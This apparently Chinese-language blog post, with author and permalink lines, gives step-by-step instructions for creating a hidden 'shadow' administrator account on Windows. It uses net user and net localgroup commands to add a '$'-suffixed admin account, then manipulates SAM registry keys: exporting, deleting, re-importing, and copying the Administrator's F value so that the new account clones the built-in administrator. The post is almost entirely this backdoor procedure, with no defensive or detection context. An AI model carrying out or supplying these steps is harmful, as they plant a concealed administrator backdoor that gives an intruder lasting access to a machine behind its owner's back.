1、创建隐藏账号
- net user test$ 123@qwe /add
- net user test$ 123@qwe /add
2、将创建的账号加入administrators组
- net localgroup administrators test$ /add
- net localgroup administrators test$ /add
3、此时在lusrgmr中还能看到
4、展开注册表[HKEY_LOCAL_MACHINE\SAM\SAM],右键为administrators用户赋予完全控制
5、F5刷新一下注册表
6、处理注册表
- 在[SAM\Domains\Account\Users\Names],选中test$,一个名为默认,类型为”0x3eb”的键值,其中”3eb”是test$用户SID的结尾,即RID
- 在[SAM\Domains\Account\Users]里有一个以”3EB”结尾的子项,存放的是test$的信息。将此项和上面的test$分别导出成扩展名为.reg的注册表文件
7、删除test$用户
- net user test$ /del
- net user test$ /del
8、再打开注册表,导入之前的两个注册表文件,这样test$账户就隐藏了,但仍然会产生用户配置文件
9、展开[SAM\Domains\Account\Users]下的000001F4,将F的键值数据全部复制,粘贴到000003EB的F键值中,也就是将administrator用户的SID复制给了test$,test$就成了administrator的影子账户与其用同一用户配置文件
10、net user test$
创建Windows影子用户
Author: felzl
Permalink: https://felzl.github.io/2021/09/15/%E5%88%9B%E5%BB%BAWindows%E5%BD%B1%E5%AD%90%E7%94%A8%E6%88%B7/
License: Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan: Do you believe in DESTINY?